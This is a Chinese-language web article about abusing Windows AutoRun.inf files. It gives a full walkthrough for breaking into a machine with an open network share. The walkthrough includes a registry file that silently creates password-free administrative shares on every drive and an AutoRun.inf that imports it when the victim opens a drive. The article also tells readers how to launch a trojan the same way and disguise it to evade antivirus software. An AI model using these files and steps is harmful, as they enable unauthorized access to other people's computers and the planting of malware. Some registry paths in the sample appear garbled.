解析 Autorun.inf文件的攻击
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
AutoRun.inf不光能让光盘自动运行程序,也能让硬盘自动运行程序,方法很简单,先打开记事本,然后用鼠标右键点击该文件,在弹出菜单中选择“重命名”,将其改名为AutoRun.inf,在AutoRun.inf中键入以下内容:[AutoRun]//表示AutoRun部分开始,必须输入Icon=C:C.ico//给C盘一个个性化的盘符图标C.icoOpen=C:1.exe//指定要运行程序的路径和名称,在此假设为C盘下的1.exe保存该文件,按F5刷新桌面,再看“我的电脑”中的该盘符(在此为C盘),你会发现它的磁盘图标变了,双击进入C盘,还会自动播放C盘下的1.exe文件!
解释一下:“[AutoRun]”行是必须的固定格式,“Icon”行对应的是图标文件,“C:C.ico”为图标文件路径和文件名,你在输入时可以将它改为你的图片文件所在路径和文件名。另外,“.ico”为图标文件的扩展名,如果你手头上没有这类文件,可以用看图软件ACDSee将其他格式的软件转换为ico格式,或者找到一个后缀名为BMP的文件,将它直接改名为ICO文件即可。
“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是,如果你要改变的硬盘跟目录下没有自动播放文件,就应该把“OPEN”行删掉,否则就会因为找不到自动播放文件而打不开硬盘,此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。
二、实例
下面就举个例子:如果你扫到一台开着139共享的机器,而对方只完全共享了D盘,我们要让对方的所有驱动器都共享。首先编辑一个注册表文件,打开记事本,键入以下内容:
REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
NetworkLanmanC$]
"ath"="C:\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"armlenc"=hex:
"arm2enc"=hex:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
NetworkLanmanD$]
"ath"="D:\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"armlenc"=hex:
"arm2enc"=hex:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
NetworkLanmanC$]
"ath"="E:\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"armlenc"=hex:
"arm2enc"=hex:
以上我只设置到E盘,如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写,其后要空上一行,在最后一行记得要按一次回车键。
然后打开记事本,编制一个AutoRun.inf文件,键入以下内容:
[AutoRun]
Open=regedit/sShare.reg//加/s参数是为了导入时不会显示任何信息保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下,这样对方只要双击D盘就会将Share.reg导入注册表,这样对方电脑重启后所有驱动器就会都完全共享出来。
如果想让对方中木马,只要在AutoRun.inf文件中,把“Open=Share.Reg”改成“Open=木马服务端文件名”,然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下,这样不需对方运行木马服务端程序,而只需他双击D盘就会使木马运行!这样做的好处显而易见,那就是大大的增加了木马运行的主动性!须知许多人现在都是非常警惕的,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。
要说明的是,给你下木马的人不会那么蠢的不给木马加以伪装,一般说来,他们会给木马服务端文件改个名字,或好听或和系统文件名很相像,然后给木马换个图标,使它看起来像TXT文件、ZIP文件或图片文件等,,最后修改木马的资源文件使其不被杀毒软件识别(具体的方法可以看网上的文章),当服务端用户信以为真时,木马却悄悄侵入了系统。其实,换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了!
请大家注意:保存的文件名必须是“AutoRun.inf”,编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步,如果你的某个硬盘内容暂时比较固定的话,不妨用Flash做一个自动播放文件,再编上“Autorun”文件,那你就有最酷、最个性的硬盘了。
到这儿还没有完。大家知道,在一些光盘放入后,我们在其图标上单击鼠标右键,还会产生一个具有特色的目录菜单,如果能对着我们的硬盘点击鼠标右键也产生这样的效果,那将更加的有特色。其实,光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句:
shell标志=显示的鼠标右键菜单中内容
shell标志command=要执行的文件或命令行
所以,要让硬盘具有特色的目录菜单,在AutoRun.inf文件中加入上述语句即可
关键词:Autorun.inf
相关阅读
- 05-06Centos6.3下Apache配置基于加密的认证https加密证书访问
- 07-18MySql5.0 Table错误:is marked as crashed and last (automatic?) repair failed
- 06-13解析平板电脑通过Wifi上网的设置
- 06-05电脑死机后重启出现:“disk read error”
- 05-27Oracle数据库如何查找删除重复的SQL语句
- 05-11电脑蓝屏STOP:C0000218错误解决方法实记
- 05-04为什么我的电脑里面到处都是autorun.inf文件夹
- 04-30解析无法删除Autorun.inf文件夹
- 06-28比僵尸更恐怖 五大主流僵尸网路全解析
- 05-01如何防止U盘中autorun.inf病毒?
阅读本文后您有什么感想? 已有 人给出评价!
用户评论
热门评论
最新评论
相关软件
热点图文
- 05-102022免费读小说软件哪个好用无广告?
- 05-04360tray.exe耗CPU过大怎样解决?
- 12-27generic host process for win32 services的解决方法
- 02-21SVCHOST.EXE病毒清除及专杀工具
- 04-27桌面出现两个ie图标删不掉 如何删除桌面恶意图标
- 08-26鼠标右键出现百度一下这个文件
- 06-04U盘中病毒了,Word文件全部乱码,如何解决?
- 04-05lsass.exe病毒清除方法及专杀工具
- 02-22淘宝购物无法删除,桌面淘宝图标删不掉怎么办?
- 12-15jwgkvsq.vmx病毒清除方法(附jwgkvsq.vmx专杀工具)